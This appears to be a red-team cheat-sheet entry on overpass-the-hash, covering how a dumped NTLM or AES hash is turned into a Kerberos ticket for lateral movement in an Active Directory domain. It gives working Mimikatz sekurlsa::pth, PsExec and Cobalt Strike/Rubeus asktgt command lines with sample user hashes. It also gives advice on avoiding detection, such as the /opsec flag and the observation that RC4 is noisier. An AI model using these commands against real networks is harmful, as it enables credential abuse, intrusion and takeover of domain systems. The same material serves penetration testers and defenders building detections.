Overpass-the-hash uses dumped hash to obtain a Kerberos TGT or TGS, granting the attacker remote access to other domain-joined machines or services. See also pass-the-key, of which overpass-the-hash is a RC4-specific case.
Requirements
- The password hash must be already cached to be dumpable.
- Local admin privileges needed to dump the hash.
- The remote must accept RC4 algorithm.
The captured NTLM hash is used as the RC4 encryption key in pass-the-key to authenticate against Kerberos.
Example
Both methods are noticeable in logs, so pick your poison.
Mimikatz
- Use Mimikatz
sekurlsa::pth
to launch PowerShell in the compromised domain user
Mimikatz creates a handle to LSASS, which may stand out as being suspicious.
- Do anything that requires Kerberos authentication to generate a TGT (e.g.,
net use \\dc01
to connect to DC network share) - Launch a remote PowerShell using
PsExec.exe
ondc01
(tool from SysInternals):.\PsExec.exe \\dc01 cmd.exe
. The use of hostname / domain name is mandatory since using IP address falls back to NTLM authentication.- Alternatively, consider using TGT in a pass-the-ticket attack.
Rubeus
- Cobalt Strike beacon & Rubeus with RC4/NTLM hash:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap
- alternatively use AES256:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap
- use the
/opsec
switch to make the ticket options flag0x40810010
instead of0x40800010
- alternatively use AES256:
- Follow the same steps in the previous section.
RC4 encryption is considered a legacy ticket encryption type, and it is much more likely to be noticed.